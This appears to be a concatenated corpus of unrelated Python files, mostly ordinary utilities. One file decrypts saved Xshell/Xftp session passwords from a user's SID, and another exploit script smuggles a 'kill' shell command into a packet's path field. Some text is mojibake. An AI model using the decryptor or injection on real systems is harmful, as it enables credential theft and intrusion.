max_el_inx = el
if array[el] < min_el:
min_el = array[el]
min_el_inx = el
print('ะะธะฝะธะผะฐะปัะฝัะน ะธ ะผะฐะบัะธะผะฐะปัะฝัะน ัะปะตะผะตะฝัั ะผะฐััะธะฒะฐ:\n', min_el, 'ะธ', max_el)
array.pop(min_el_inx)
array.insert(min_el_inx, max_el)
array.pop(max_el_inx)
array.insert(max_el_inx, min_el)
print('ะะฐััะธะฒ, ะฒ ะบะพััะพะผ ะฟะพะผะตะฝัะฝั ะผะตััะฐะผะธ ะผะธะฝะธะผะฐะปัะฝัะน ะธ ะผะฐะบัะธะผะฐะปัะฝัะน ัะปะตะผะตะฝัั:\n', array)
|
7,178 | 962a9781e4f2ad787dd695896b6455c9b336603a | from core import Postgresdb
# Smoke test: instantiate the project's Postgres wrapper and print its repr.
db = Postgresdb()
print(db)
7,179 | 03677f02473019fcc6a40d91569a85be78ca0a87 | #!/usr/bin/env python3
from datetime import datetime
import re
import sys
# Convert a kissfft-style CHANGELOG (read from stdin) into Debian changelog
# format (written to stdout).
MONTHS_REGEXP = ('Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|'
                 'January|February|March|April|June|July|August|September|October|November|December')

# An entry header is "<version> (<date>)" where the date is ISO or
# "<Month> DD, YYYY" and may be absent entirely.
re_entry_begin = re.compile(r'(?P<version>[\d.]+)[ :]*\(?(?P<date>\d\d\d\d-\d\d-\d\d|(?:'
                            + MONTHS_REGEXP + r') \d\d, \d\d\d\d)?\)?.*$')

header_format = 'libkissfft ({version}) stable; urgency=medium\n\n'
signature_format = ' -- Paul Morelle <paul@scengrafics.com> {date:%a, %d %b %Y %H:%M:%S +0000}\n\n'

# Date formats tried in order when parsing an entry date. Naming the tuple
# fixes a bug: the error message below referenced an undefined name
# `date_formats`, so the intended ValueError was masked by a NameError.
DATE_FORMATS = ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y')

# Missing from CHANGELOG (found in hg log), or not parseable easily
VERSION_DATES = {
    '1.2.8': '2008-08-22',
    '1.2.7': '2007-01-07',
    '1.2.2': '2005-05-06',
    '1.2.1': '2004-04-04',
    '1.1.1': '2004-02-01',
    '1.1': '2004-01-30',
    '0.4': '2003-11-04',
    '0.1': '2003-05-19',
}

first_line_met = False   # seen at least one entry header yet?
current_date = None      # datetime of the entry currently being emitted
last_line_blank = False  # collapse runs of blank lines

for line in sys.stdin:
    m = re_entry_begin.match(line)
    if m:
        # Close the previous entry with its signature before opening a new one.
        if first_line_met:
            sys.stdout.write(signature_format.format(date=current_date))
        version = m.group('version')
        sys.stdout.write(header_format.format(version=version))
        date = m.group('date')
        if date is None:
            # Fall back to the hand-maintained table for undated entries.
            date = VERSION_DATES[version]
        current_date = None
        for date_format in DATE_FORMATS:
            try:
                current_date = datetime.strptime(date, date_format)
                break
            except ValueError:
                continue
        if current_date is None:
            raise ValueError('Date {} does not match any date format in {!r}'
                             .format(date, DATE_FORMATS))
        first_line_met = True
    # NOTE(review): the raw string below is matched literally by startswith
    # (leading backslash included), not as a regex -- confirm intended.
    line_blank = not line.strip() or line.startswith(r'\* *This Change Log was')
    if first_line_met and not (line_blank and last_line_blank):
        sys.stdout.write(' ' + line)
    last_line_blank = line_blank

# Sign off the final entry.
if first_line_met:
    if not line_blank:
        sys.stdout.write('\n')
    sys.stdout.write(signature_format.format(date=current_date))
7,180 | 1330addd53c6187a41dfea6957bf47aaecca1135 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-27 21:59
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import phonenumber_field.modelfields
class Migration(migrations.Migration):
    # Auto-generated schema migration for the `regions` app: alters four
    # Region fields (email, governor FK, phone, twitter), each of which is
    # redefined here with null=True (twitter also blank=True).

    dependencies = [
        ('regions', '0002_auto_20171024_1707'),
    ]

    operations = [
        migrations.AlterField(
            model_name='region',
            name='email',
            field=models.EmailField(max_length=100, null=True, verbose_name='email'),
        ),
        migrations.AlterField(
            model_name='region',
            name='governor',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='public_servants.PublicServant', verbose_name='governor'),
        ),
        migrations.AlterField(
            model_name='region',
            name='phone',
            field=phonenumber_field.modelfields.PhoneNumberField(max_length=128, null=True, verbose_name='phone'),
        ),
        migrations.AlterField(
            model_name='region',
            name='twitter',
            field=models.CharField(blank=True, max_length=50, null=True),
        ),
    ]
7,181 | 5f2427c077d460d109f5a3e94b93f72c090f036d | # -*- coding: utf-8 -*-
# python >= 3.7
# supported xmanager version <5.1, 5.1, 5.2, 6
import os
import argparse
import configparser
import unicodedata
from win32api import GetComputerName, GetUserName
from win32security import LookupAccountName, ConvertSidToStringSid
from base64 import b64encode, b64decode
from Cryptodome.Hash import MD5, SHA256
from Cryptodome.Cipher import ARC4
# Module-level configuration for the NetSarang password (de|en)cryptor.
USERNAME = GetUserName()  # Windows account name; part of the key material for versions > 5.2
MASTER_PWD = None  # optional master password; when set it replaces the user-derived key (> 5.2)
SID = ConvertSidToStringSid(LookupAccountName(GetComputerName(), GetUserName())[0])  # current user's string SID
IS_XSH = True  # True = Xshell, False = Xftp; selects the fixed key string for versions < 5.1
VERSION = '5.2'  # product version; selects the key-derivation scheme in getCipherKey()
KEY = os.path.join(os.environ["USERPROFILE"], r"Documents\NetSarang\Xshell\Sessions")  # default sessions folder
IS_DECRYPT = True  # presumably toggles decrypt vs. encrypt mode elsewhere -- confirm against CLI handling
def getCipherKey():
    """Derive the RC4 key for the configured product VERSION.

    Key schedule by version range:
      < 5.1      : MD5 of a fixed product string (Xshell vs. Xftp via IS_XSH).
      5.1 -- 5.2 : SHA-256 of the user's string SID.
      > 5.2      : SHA-256 of USERNAME + SID, or of MASTER_PWD when set.

    Raises ValueError when VERSION is not numeric or not positive.
    """
    if not is_number(VERSION):
        raise ValueError('Invalid argument: --Version')
    ver = float(VERSION)
    if 0 < ver and ver < 5.1:
        if IS_XSH:
            return MD5.new(b'!X@s#h$e%l^l&').digest()
        else:
            return MD5.new(b'!X@s#c$e%l^l&').digest()
    elif 5.1 <= ver and ver <= 5.2:
        return SHA256.new(SID.encode()).digest()
    elif 5.2 < ver:
        if MASTER_PWD == None:
            return SHA256.new((USERNAME + SID).encode()).digest()
        else:
            return SHA256.new(MASTER_PWD.encode()).digest()
    else:
        # ver <= 0
        raise ValueError('Invalid argument: --Version')
def encrypt_string(password_string, need_return=False):
    """RC4-encrypt *password_string* with the version-specific key.

    Versions < 5.1 store base64(RC4(password)); 5.1+ append a SHA-256
    checksum of the plaintext before base64-encoding (verified on decrypt).
    Prints version/plaintext/ciphertext unless need_return is True, in which
    case the encoded string is returned instead.
    """
    if not is_number(VERSION):
        raise ValueError('Invalid argument: --Version')
    ver = float(VERSION)
    Cipher = ARC4.new(getCipherKey())
    if ver < 5.1:
        en_password = b64encode(Cipher.encrypt(password_string.encode())).decode()
    else:
        # Newer format: ciphertext followed by a SHA-256 digest of the plaintext.
        checksum = SHA256.new(password_string.encode()).digest()
        ciphertext = Cipher.encrypt(password_string.encode())
        en_password = b64encode(ciphertext + checksum).decode()
    if need_return:
        return en_password
    else:
        print('%-20s : %s' % ('Version', VERSION))
        print('%-20s : %s' % ('Password', password_string))
        print('%-20s : %s' % ('Encrypted Password', en_password))
def decrypt_string(password_string, need_return=False):
    """Decrypt a base64 RC4-encrypted password for the configured VERSION.

    For version >= 5.1 the trailing 32 bytes are a SHA-256 checksum of
    the plaintext, verified after decryption.  Returns the plaintext when
    *need_return* is true, otherwise prints a report.
    NOTE(review): any failure is swallowed -- "Password is invalid" is
    printed and (when need_return) None is implicitly returned.
    """
    if not is_number(VERSION):
        raise ValueError('Invalid argument: --Version')
    ver = float(VERSION)
    Cipher = ARC4.new(getCipherKey())
    try:
        if ver < 5.1:
            de_password = Cipher.decrypt(b64decode(password_string)).decode()
        else:
            # Layout: ciphertext || SHA256(plaintext).
            data = b64decode(password_string)
            ciphertext, checksum = data[:-SHA256.digest_size], data[-SHA256.digest_size:]
            plaintext = Cipher.decrypt(ciphertext)
            if SHA256.new(plaintext).digest() != checksum:
                raise ValueError('Cannot decrypt string. The key is wrong!')
            de_password = plaintext.decode('ascii')
        if need_return:
            return de_password
        else:
            print('%-20s : %s' % ('Version', VERSION))
            print('%-20s : %s' % ('Password', password_string))
            print('%-20s : %s' % ('Decrypted Password', de_password))
    except Exception as e:
        print("Password is invalid")
def decrypt_file(filepath: str = ''):
    """Parse one .xsh/.xfp session file and print host/port/credentials.

    Session files are INI-style; .xsh and .xfp use different section
    names.  Files without those extensions are silently ignored; parse
    errors are reported inline.
    NOTE(review): decryption uses the global VERSION, not the file's own
    "Version" field read below -- confirm that is intended.
    """
    if not os.path.isfile(filepath):
        print(f"{filepath:=^100}\nError: No file")
        return
    file = os.path.basename(os.path.realpath(filepath))
    if file.endswith(".xsh") or file.endswith(".xfp"):
        cfg = configparser.ConfigParser()
        try:
            cfg.read(filepath)
        except UnicodeDecodeError:
            # Some NetSarang files are saved as UTF-16.
            cfg.read(filepath, encoding="utf-16")
        try:
            if file.endswith(".xsh"):
                host = cfg["CONNECTION"]["Host"]
                port = cfg["CONNECTION"]["Port"]
                username = cfg["CONNECTION:AUTHENTICATION"]["UserName"]
                password = cfg["CONNECTION:AUTHENTICATION"]["Password"]
                version = cfg["SessionInfo"]["Version"]
                de_password = decrypt_string(password, True)
            else:
                host = cfg["Connection"]["Host"]
                port = cfg["Connection"]["Port"]
                username = cfg["Connection"]["UserName"]
                password = cfg["Connection"]["Password"]
                version = cfg["SessionInfo"]["Version"]
                de_password = decrypt_string(password, True)
            print(f"{filepath:=^100}")
            print('%-20s : %s' % ('Host', host))
            print('%-20s : %s' % ('Port', port))
            print('%-20s : %s' % ('Version', version))
            print('%-20s : %s' % ('UserName', username))
            print('%-20s : %s' % ('Password', de_password))
            print('%-20s : %s' % ('Encrypted Password', password))
        except Exception as e:
            print(f"{filepath:=^100}\nError:{e}")
def decrypt_dir():
    """Recursively decrypt every session file found under the KEY directory."""
    for folder, _subdirs, filenames in os.walk(KEY):
        for name in filenames:
            full_path = os.path.join(folder, name)
            decrypt_file(full_path)
def setDefaultSessionDirByVer():
    """Point the global KEY at the default sessions directory for VERSION.

    NOTE(review): versions above 6 (e.g. 6.5, 7) match neither branch and
    leave KEY unchanged -- confirm whether newer layouts need handling.
    """
    if not is_number(VERSION):
        return
    ver = float(VERSION)
    dir = 'Xshell' if IS_XSH else 'Xftp';
    global KEY
    if ver < 6:
        KEY = os.path.join(os.environ["USERPROFILE"], r"Documents\NetSarang\%s\Sessions" % dir)
    elif ver == 6:
        KEY = os.path.join(os.environ["USERPROFILE"], r"Documents\NetSarang Computer\6\%s\Sessions" % dir)
def is_number(s):
    """Return True if *s* parses as a number via float() or as a numeric
    Unicode character via unicodedata.numeric(), else False."""
    for convert, errors in ((float, (ValueError,)),
                            (unicodedata.numeric, (TypeError, ValueError))):
        try:
            convert(s)
            return True
        except errors:
            continue
    return False
if __name__ == '__main__':
    # CLI entry point: decrypt (default) or encrypt Xshell/Xftp passwords.
    parser = argparse.ArgumentParser(description="xsh, xfp password decrypt")
    group = parser.add_mutually_exclusive_group(required=False)
    group.add_argument("-e", "--encrypt", default=False,
                       help="<-e | -d> encrypt password, default -d", action="store_true")
    group.add_argument("-d", "--decrypt", default=True,
                       help="<-e | -d> decrypt encrypted password, default -d", action="store_true")
    parser.add_argument("-f", "--ftp", default=False,
                        help="xftp or xshell. Ignore if it is xshell", action="store_true")
    parser.add_argument("-u", "--username", default="", type=str,
                        help="user `whoami /user` in command. Ignore if it is local. Used by version >= 5.1")
    parser.add_argument("-m", "--master_pwd", default="", type=str,
                        help="user\'s master password. Used by version >= 6")
    parser.add_argument("-s", "--sid", default="", type=str,
                        help="SID `whoami /user` in command. Ignore if it is local. Used by version >= 5.1")
    parser.add_argument("-v", "--version", default="", type=str,
                        help="xsh or xfp version. If not specified, 5.2 will be used.")
    parser.add_argument("-k", "--key", default="", nargs='?',
                        help="the path of sessions directory or file of xsh or xfp, or password or other key")
    args = parser.parse_args()
    #print(args)
    # Override the module-level defaults from whatever flags were given.
    if args.encrypt:
        IS_DECRYPT = False
    if args.sid:
        SID = args.sid
    if args.username:
        USERNAME = args.username
    if args.master_pwd:
        MASTER_PWD = args.master_pwd
    if args.ftp:
        IS_XSH = False
    if is_number(args.version):
        VERSION = args.version
    if args.key:
        KEY = args.key
    # No explicit key: derive the default sessions dir for version/product.
    if not args.key and (is_number(args.version) or args.ftp):
        setDefaultSessionDirByVer()
    # KEY may be a sessions directory, a single session file, or a raw string.
    if IS_DECRYPT:
        if os.path.isdir(KEY):
            decrypt_dir()
        elif os.path.isfile(KEY):
            decrypt_file(KEY)
        else:
            decrypt_string(KEY)
    else:
        encrypt_string(KEY)
7,182 | 82f86284dddf48bf2c65ddf55eb6d7a372306373 | #Import dependencies
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
import string
import operator
from sklearn.feature_extraction.text import CountVectorizer
import pickle
import nltk
from nltk.corpus import stopwords
#nltk.download('stopwords')
from nltk.tokenize import word_tokenize
def text_process(text):
    """Strip punctuation from *text*, split on whitespace, and drop
    English stopwords (case-insensitive)."""
    cleaned = ''.join(ch for ch in text if ch not in string.punctuation)
    return [token for token in cleaned.split()
            if token.lower() not in stopwords.words('english')]
#Looping through the web-scraped reviews to make predictions
def ml_predictor(web_scrapedf):
    """Score each review in *web_scrapedf* with the pickled classifier.

    Expects a 'Reviews' column; writes an 'ml_predictions' column on the
    frame in place and returns a view with just those two columns.
    """
    # Load the trained classifier and its fitted vectorizer, closing the
    # files deterministically (the originals leaked the handles).
    # NOTE(review): the pickled vectorizer was fitted with
    # analyzer=text_process, so the module-level text_process must be
    # importable when unpickling.  A dead nested duplicate of
    # text_process was removed here -- it was never used.
    with open("ml_model/model.pickle", 'rb') as model_file:
        loaded_model = pickle.load(model_file)
    with open("ml_model/vectorizer.pickle", 'rb') as vectorizer_file:
        loaded_vectorizor = pickle.load(vectorizer_file)
    # Predict one review at a time and store the label on its row.
    for label, row in web_scrapedf.iterrows():
        text_transform = loaded_vectorizor.transform([row['Reviews']])
        web_scrapedf.at[label, 'ml_predictions'] = loaded_model.predict(text_transform)[0]
    # Filter down to the columns callers need.
    scrape_results_df = web_scrapedf[['Reviews', 'ml_predictions']]
    return scrape_results_df
#Function to create positive words for word cloud
def positive_words(scrape_results_df):
    """Return the most frequent words from reviews predicted 'Positive'.

    Counts words with CountVectorizer using the module-level
    text_process analyzer; returns (word, count) tuples sorted by
    descending count, truncated to 49 entries.
    """
    # The nested duplicate of text_process that used to live here was
    # removed; the identical module-level function is used instead.
    positive_wordcloud = scrape_results_df[scrape_results_df['ml_predictions'] == 'Positive']
    positivecv = CountVectorizer(analyzer=text_process)
    positive_fit = positivecv.fit_transform(positive_wordcloud['Reviews'])
    # Pair each vocabulary word with its total count across all reviews.
    word_totals = dict(zip(positivecv.get_feature_names(),
                           positive_fit.toarray().sum(axis=0)))
    ranked = sorted(word_totals.items(), key=operator.itemgetter(1), reverse=True)
    ranked = [(word, int(count)) for word, count in ranked]
    # NOTE(review): [:49] keeps 49 entries; if "top 50" was intended use [:50].
    return ranked[:49]
#Function to create negative words for word cloud
def negative_words(scrape_results_df):
    """Return the most frequent words from reviews predicted 'Negative'.

    Mirror of positive_words: counts words with CountVectorizer using the
    module-level text_process analyzer; returns (word, count) tuples
    sorted by descending count, truncated to 49 entries.
    """
    # The nested duplicate of text_process that used to live here was
    # removed; the identical module-level function is used instead.
    negative_wordcloud = scrape_results_df[scrape_results_df['ml_predictions'] == 'Negative']
    negativecv = CountVectorizer(analyzer=text_process)
    negative_fit = negativecv.fit_transform(negative_wordcloud['Reviews'])
    # Pair each vocabulary word with its total count across all reviews.
    word_totals = dict(zip(negativecv.get_feature_names(),
                           negative_fit.toarray().sum(axis=0)))
    ranked = sorted(word_totals.items(), key=operator.itemgetter(1), reverse=True)
    ranked = [(word, int(count)) for word, count in ranked]
    # NOTE(review): [:49] keeps 49 entries; if "top 50" was intended use [:50].
    return ranked[:49]
|
7,183 | cb1e73d172314c8d3d31f6e49fa67582375c0c58 | #!/usr/bin/env python3
# coding:utf-8
# Improved little red ball (bouncing-ball demo)
class Ball:
    """A ball bouncing on a Tk canvas.

    NOTE(review): this module uses `random` (and the loop below uses
    `tk`/`time`) without visible imports, and `hit_paddle` is not defined
    in the visible part of this class -- presumably elsewhere in the
    file; confirm before running.
    """
    def __init__(self, canvas, paddle, color):
        self.canvas = canvas
        self.paddle = paddle
        self.id = canvas.create_oval(10, 10, 25, 25, fill=color)
        self.canvas.move(self.id, 245, 100)
        starts = [-3, -2, -1, 1, 2, 3]
        random.shuffle(starts)  # shuffle the candidate horizontal speeds
        self.x = starts[0]  # horizontal speed, picked at random
        self.y = -3  # vertical speed (negative = moving up)
        self.canvas_height = self.canvas.winfo_height()  # canvas height
        self.canvas_width = self.canvas.winfo_width()  # canvas width
    def draw(self):
        """Advance the ball one step, bouncing off walls and the paddle."""
        self.canvas.move(self.id, self.x, self.y)
        pos = self.canvas.coords(self.id)  # current bounding box
        if pos[1] <= 0:  # hit the top edge
            self.y = 3
        if pos[3] >= self.canvas_height:  # hit the bottom edge
            self.y = -3
        if self.hit_paddle(pos) == True:  # bounced off the paddle
            self.y = -3
        if pos[0] <= 0:  # hit the left edge
            self.x = 3
        if pos[2] >= self.canvas_width:  # hit the right edge
            self.x = -3
# Add the ball to the main animation loop
# NOTE(review): `ball`, `tk` and `time` are not defined in the visible
# portion of this file -- presumably created earlier; confirm.
while 1:
    ball.draw()
    tk.update_idletasks()
    tk.update()
    time.sleep(0.01)
|
7,184 | 222948fb0a991bb6d7faa186c7442a303b88290b | from django.contrib import admin
from apps.cart.models import *
# Register your models here.
class CartAdmin(admin.ModelAdmin):
    """Admin configuration for Cart rows (user, goods, quantity)."""
    # Consistency fix: list_filter was a list while the other two options
    # were tuples; all three now use tuples.
    list_display = ('user_id', 'goods_id', 'goods_num')
    search_fields = ('user_id', 'goods_id', 'goods_num')
    list_filter = ('user_id', 'goods_id', 'goods_num')
admin.site.register(Cart, CartAdmin)
|
7,185 | 9a02bd0bc14494db033c032003aa5baea111ea8c | import random
import Manhattan_segmental_dist
# Greedy
# s: dictionary of points
# k: number of medoids
# returns
# k medoids from sample set s
def greedy(s, k):
    """Pick *k* well-spread medoids from point dict *s* (greedy
    farthest-point strategy using Manhattan segmental distance).

    NOTE: mutates *s* -- chosen medoids are popped from the dictionary.
    """
    first = random.choice(list(s.keys()))
    medoids = {first: s[first]}
    dimensions = list(range(len(s[first])))
    s.pop(first)
    # Distance from every remaining point to its nearest chosen medoid.
    nearest = {}
    for point in s:
        nearest[point] = Manhattan_segmental_dist.manhattan_segmental_dist(
            medoids[first], s[point], dimensions)
    for _ in range(1, k):
        # The point farthest from all current medoids becomes the next medoid.
        chosen = max(nearest, key=nearest.get)
        medoids[chosen] = s[chosen]
        nearest.pop(chosen)
        s.pop(chosen)
        for point in s:
            candidate = Manhattan_segmental_dist.manhattan_segmental_dist(
                medoids[chosen], s[point], dimensions)
            nearest[point] = min(nearest[point], candidate)
    return medoids
|
7,186 | 1f8040776a55d6fe52b64c714d4003469460e454 | # ์ฌ์ฌ๋ฌธ์ 22
# ํ์ค ์
๋ ฅ์ผ๋ก ์ ์ ๋ ๊ฐ๊ฐ ์
๋ ฅ๋ฉ๋๋ค(์ฒซ ๋ฒ์งธ ์
๋ ฅ ๊ฐ์ ๋ฒ์๋ 1~20, ๋ ๋ฒ์งธ ์
๋ ฅ ๊ฐ์ ๋ฒ์๋ 10~30์ด๋ฉฐ ์ฒซ ๋ฒ์งธ ์
๋ ฅ ๊ฐ์ ๋ ๋ฒ์งธ ์
๋ ฅ ๊ฐ๋ณด๋ค ํญ์ ์์ต๋๋ค).
# ์ฒซ ๋ฒ์งธ ์ ์๋ถํฐ ๋ ๋ฒ์งธ ์ ์๊น์ง๋ฅผ ์ง์๋ก ํ๋ 2์ ๊ฑฐ๋ญ์ ๊ณฑ ๋ฆฌ์คํธ๋ฅผ ์ถ๋ ฅํ๋ ํ๋ก๊ทธ๋จ์ ๋ง๋์ธ์
# (input์์ ์๋ด ๋ฌธ์์ด์ ์ถ๋ ฅํ์ง ์์์ผ ํฉ๋๋ค). ๋จ, ๋ฆฌ์คํธ์ ๋ ๋ฒ์งธ ์์์ ๋ค์์ ๋ ๋ฒ์งธ ์์๋ ์ญ์ ํ ๋ค ์ถ๋ ฅํ์ธ์. ์ถ๋ ฅ ๊ฒฐ๊ณผ๋ ๋ฆฌ์คํธ ํํ๋ผ์ผ ํฉ๋๋ค.
start, stop = list(map(int, input().split()))
# Fixed: removed a stray "1 10" sample-input line that made this file a
# SyntaxError (that pair belongs on stdin, not in the source), and the
# unused `i = 0` (the comprehension variable has its own scope).
my = [2 ** i for i in range(start, stop + 1)]  # powers of two, start..stop
my.pop(1)   # drop the second element
my.pop(-2)  # drop the (new) second-to-last element
print(my)
# Review problem 23
col, row = list(map(int, input().split()))
# Read `row` lines from stdin, splitting each into a list of characters.
matrix = [list(input()) for _ in range(row)]
|
7,187 | d4a4ea67a06107ad7ea18bb21fb1ec9e74ccd7c1 | #!/usr/bin/env python
import sys
import subprocess
import mystem
def run(args, fin=sys.stdin, fout=sys.stdout, ferr=sys.stderr, input_data=None):
    '''\
    Generic wrapper for MyStem

    Locates the mystem binary, forces utf-8 output unless the caller
    already passed -e, runs it with the given stdio streams and returns
    (returncode, stdout_data, stderr_data).

    NOTE(review): mutates the caller's *args* list in place, and when
    *fout*/*ferr* are real streams (the defaults) communicate() returns
    None for the corresponding data fields -- confirm callers expect that.
    '''
    mystem_path = mystem.util.find_mystem()
    # make utf-8 a default encoding
    if '-e' not in args:
        args.extend(["-e", "utf-8"])
    p = subprocess.Popen([mystem_path] + args,
                         stdout=fout,
                         stderr=ferr,
                         stdin=fin)
    out_data, err_data = p.communicate(input=input_data)
    return p.returncode, out_data, err_data
def main(args):
    # Thin CLI entry point: forward the argv tail straight to run().
    return run(args)
if __name__ == "__main__":
    # Exit with mystem's own return code.
    sys.exit(main(sys.argv[1:])[0])
|
7,188 | 84febcc599aa97858ded3b6f803b6b76960878d4 | from itertools import takewhile
import numpy as np
from .rrt import TreeNode
from .trajectory.linear import get_default_limits, solve_linear
from .trajectory.retime import spline_duration
from .utils import argmin, negate, circular_difference, UNBOUNDED_LIMITS, get_distance, get_delta
ASYMETRIC = True
def asymmetric_extend(q1, q2, extend_fn, backward=False):
    """Extend from q1 toward q2.  When *backward* is set (and the module
    ASYMETRIC flag is on), run the forward model q2->q1 and reverse the
    resulting waypoint sequence."""
    if not (backward and ASYMETRIC):
        return extend_fn(q1, q2)
    return reversed(list(extend_fn(q2, q1)))  # Forward model
def extend_towards(tree, target, distance_fn, extend_fn, collision_fn, swap=False, tree_frequency=1, **kwargs):
    """Grow *tree* toward *target* along a collision-free prefix.

    Picks the tree node nearest *target*, extends from it (direction
    flipped when *swap* for asymmetric extension), keeps the prefix of
    waypoints up to the first collision, and inserts every
    *tree_frequency*-th waypoint (always including the last safe one) as
    a TreeNode.  Returns (last_node, success) where *success* is True
    when the entire extension was collision-free.
    """
    assert tree_frequency >= 1
    last = argmin(lambda n: distance_fn(n.config, target), tree)
    extend = list(asymmetric_extend(last.config, target, extend_fn, backward=swap))
    safe = list(takewhile(negate(collision_fn), extend))
    for i, q in enumerate(safe):
        if (i % tree_frequency == 0) or (i == len(safe) - 1):
            last = TreeNode(q, parent=last)
            tree.append(last)
    success = len(extend) == len(safe)
    return last, success
##################################################
def calculate_radius(d=2):
    """RRT* connection-radius constant (gamma) for a d-dimensional unit cube.

    From Karaman & Frazzoli, "Sampling-based Algorithms for Optimal
    Motion Planning"; callers still multiply by (log(n)/n)**(1/d).
    # TODO: unify with get_threshold_fn
    """
    # Free-space volume of the unit interval^d and the (approximate)
    # volume term pi * r**d used by the original implementation, r = 1/2.
    side = 1 - 0
    free_volume = side ** d
    ball_volume = np.pi * ((1. / 2) ** d)
    return 2 * ((1 + 1. / d) * (free_volume / ball_volume)) ** (1. / d)
def default_weights(conf, weights=None, scale=1.):
    """Return *weights* unchanged if given, otherwise a uniform vector of
    *scale* with one entry per dimension of *conf*."""
    if weights is not None:
        return weights
    return scale * np.ones(len(conf))
def get_embed_fn(weights):
    """Return a function that scales a configuration elementwise by *weights*."""
    scaling = np.array(weights)
    def embed(q):
        return scaling * q
    return embed
def get_distance_fn(weights, p_norm=2):
    """Return a weighted p-norm distance function between configurations
    (the embedding by *weights* is inlined here)."""
    scaling = np.array(weights)
    def distance(q1, q2):
        return np.linalg.norm(scaling * q2 - scaling * q1, ord=p_norm)
    return distance
def distance_fn_from_extend_fn(extend_fn):
    """Distance proxy: the number of waypoints *extend_fn* produces
    between two configurations."""
    # TODO: can compute cost between waypoints from extend_fn
    def distance_fn(q1, q2):
        waypoints = list(extend_fn(q1, q2))  # TODO: cache
        return len(waypoints)  # TODO: subtract endpoints?
    return distance_fn
##################################################
def get_difference_fn(circular={}):
    """Return a componentwise difference q2 - q1 that respects wrap-around.

    *circular* maps joint index -> interval for circular joints; other
    components use UNBOUNDED_LIMITS (plain subtraction).
    NOTE(review): the mutable default dict is shared across calls; it is
    only read here, but confirm no caller mutates the returned closure's
    dict.
    """
    def fn(q2, q1):
        return tuple(circular_difference(v2, v1, interval=circular.get(i, UNBOUNDED_LIMITS))
                     for i, (v2, v1) in enumerate(zip(q2, q1)))
    return fn
def get_cost_fn(distance_fn=get_distance, constant=0., coefficient=1.):
    """Affine edge cost: constant + coefficient * distance(q1, q2)."""
    def cost(q1, q2):
        distance = distance_fn(q1, q2)
        return constant + coefficient * distance
    return cost
def get_duration_fn(difference_fn=get_delta, t_constant=0., t_min=0., **kwargs):
    """Return a function estimating travel time between configurations.

    The time is t_constant plus the duration of a velocity/acceleration
    limited linear ramp over difference_fn(q1, q2), floored at t_min.
    Extra kwargs are forwarded to get_default_limits (v_max / a_max).
    """
    v_max, a_max = get_default_limits(d=None, **kwargs)
    def fn(q1, q2):
        # TODO: be careful that not colinear with other waypoints
        difference = difference_fn(q1, q2)
        t_transit = 0.
        # Zero displacement needs no transit time.
        if not np.allclose(np.zeros(len(difference)), difference, atol=1e-6, rtol=0):
            t_transit = solve_linear(difference, v_max, a_max, only_duration=True)
            assert t_transit is not None
        #curve = solve_linear(difference, v_max, a_max)
        #t_transit = spline_duration(curve)
        t = t_constant + t_transit
        return max(t_min, t)  # TODO: clip function
    return fn
7,189 | f19e853af675c16dfbb911bf2b756de0f1e3f2f8 | #!/usr/bin/python
import os
from base_exploit import *
from reporter import *
from netfw import *
import sys
class remote_shell(base_exploit):
    # Exploit that sends a crafted fragmented UDP packet whose "path"
    # field injects a shell command (kills the target client process).
    # Python 2 code; socket/packet helpers come from the star imports.
    id = EXPLOIT_ID_REMOTE_SHELL
    def exploit(self, ip, port):
        # Create a connection to requested destination
        s = socket(AF_INET, SOCK_DGRAM)
        s.connect((ip, port))
        # Change script's working directory to this dir
        abspath = os.path.abspath(__file__)
        dname = os.path.dirname(abspath)
        os.chdir(dname)
        # Read the payload
        payload = " "
        # Path to override: command injection through the path field;
        # tabs replace spaces to get past the target's space handling.
        #path = "somefile;kill `pidof client | tr \" \" \\\\\\\\n | head -n 1`".replace(" ", "\t")
        path = "somefile;kill `pidof -s client`".replace(" ", "\t")
        # Create the malicious packet
        pkt = ProtocolHandleUpper(path, payload)
        # Fragment the packets and send
        FragmentedPacket(pkt).send(s)
if __name__ == "__main__":
    # CLI: remote_shell.py <ip> <port>  (Python 2 -- print statements).
    if (len(sys.argv) != 3):
        print "RemoteShell exploit"
        print "Usage: %s <ip> <Wrapper RECV port>" % (sys.argv[0])
        exit(0)
    exp = remote_shell(TEAM_CONFIG_DEBUG)
    score = exp.run()
    print "exploit returned score %s" % score
|
7,190 | 014509170b98a38838859d3ca48c74ca6be0bd46 | #encoding:utf-8
class Employee():
    """A simple employee record: name, sex and salary."""
    def __init__(self, name, sex, salary):
        # Fixed: the constructor was misspelled __int__, so
        # Employee(name, sex, salary) raised TypeError and the
        # attributes were never set.
        self.name = name
        self.sex = sex
        self.salary = salary
    def give_raise(self):
        # TODO(review): the original body was the bare no-op expression
        # `222`; the intended raise amount/logic is unknown -- implement
        # once the requirement is clarified.
        pass
7,191 | 061c287d5f0a5feeeaedc80eea6b3fc4ff02286e | import logging
from typing import Dict
import numpy as np
from meshkit import Mesh
from rendkit.materials import DepthMaterial
from vispy import gloo, app
from vispy.gloo import gl
logger = logging.getLogger(__name__)
class Renderable:
    # One drawable chunk: a material name plus vertex attribute arrays.
    # Lazily (re)compiles its GL program whenever the scene it is drawn
    # in changes, or that scene bumps its version counter.
    def __init__(self,
                 material_name: str,
                 attributes: Dict[str, np.ndarray],
                 model_mat=np.eye(4),
                 uv_scale=1.0):
        self.model_mat = model_mat
        self.material_name = material_name
        self._attributes = attributes
        self._uv_scale = uv_scale
        # Program-cache state: which scene/version the program was built for.
        self._current_scene = None
        self._program = None
        self._scene_version = -1
    def set_uv_scale(self, scale):
        # Replace the UV scale; push it to the GPU if a program exists.
        self._uv_scale = scale
        if 'a_uv' in self._attributes:
            if self._program is not None:
                self._program['u_uv_scale'] = self._uv_scale
    def scale_uv_scale(self, v):
        # Multiply the current UV scale by *v* (same upload rules as above).
        self._uv_scale *= v
        if 'a_uv' in self._attributes:
            if self._program is not None:
                self._program['u_uv_scale'] = self._uv_scale
    def activate(self, scene, camera):
        """Ensure the GL program is compiled and up-to-date for *scene*,
        upload uniforms/attributes, and return the program."""
        material = scene.get_material(self.material_name)
        if self._program is None or scene != self._current_scene:
